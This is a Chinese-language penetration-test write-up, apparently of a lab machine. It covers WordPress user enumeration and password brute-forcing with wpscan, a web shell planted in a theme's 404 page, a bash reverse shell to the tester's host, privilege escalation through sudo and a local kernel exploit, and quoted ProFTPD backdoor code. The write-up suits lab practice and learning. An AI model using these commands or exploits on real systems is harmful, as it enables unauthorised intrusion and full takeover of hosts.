目标IP:xxxx.95
测试IP:xxxx.96
测试环境:win10、kali等
测试时间:2021.7.23-2021.7.26
测试人员:ruanruan

通过御剑扫描到/secret/目录

访问是wordpress博客

高版本,未做尝试
利用wpscan先枚举出用户名,再爆破密码,得到admin/admin。
wpscan --url xxxx.95/secret -e u

wpscan --url xxxx.95/secret/ -U admin -P rockyou.txt

访问wp默认后台进行登录。

wordpress后台getshell的常见方法有:
这里通过在线编辑页面。
首先点击主题,选择editor对404页面进行编辑,写一句话

完整页面链接:http://xxxx.95/secret/wp-content/themes/twentyseventeen/404.php
然后菜刀连接,getshell
查看id,目前是www-data

查看端口开放情况
netstat -ano

查看数据库配置

查看home目录,猜测marlinspike为用户名

进入marlinspike目录,两个提示信息:sudo提权和proftpd后门?

查看etc/passwd,确认存在该用户

菜刀的shell不好用,反弹shell到kali
bash -c 'bash -i >&/dev/tcp/xxxx.96/2333' 0>&1

猜测账号密码为marlinspike/marlinspike,ssh登录

然后就继续收集信息尝试提权。
sudo -l,查看root权限运行的命令
All~~,直接sudo su

uname -a

searchsploit ubuntu 4.10.0

查看exp详细信息,获得路径
searchsploit -p 45010.c

登录sftp,上传exp
sftp marlinspike@xxxx.95
put 45010.c

编译.c文件并执行
gcc 45010.c -o exp
la -l exp
./exp
/bin/bash

marlinspike账号有该文件的写权限。
ls -al /etc/passwd

可直接修改X为新密码

前面的提示信息有暗示后门,没有善用搜索。
搜索:proftpd 1.3.3.c 后门
具体参考:https://blog.csdn.net/weixin_34384681/article/details/89798540
关键漏洞代码:
if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
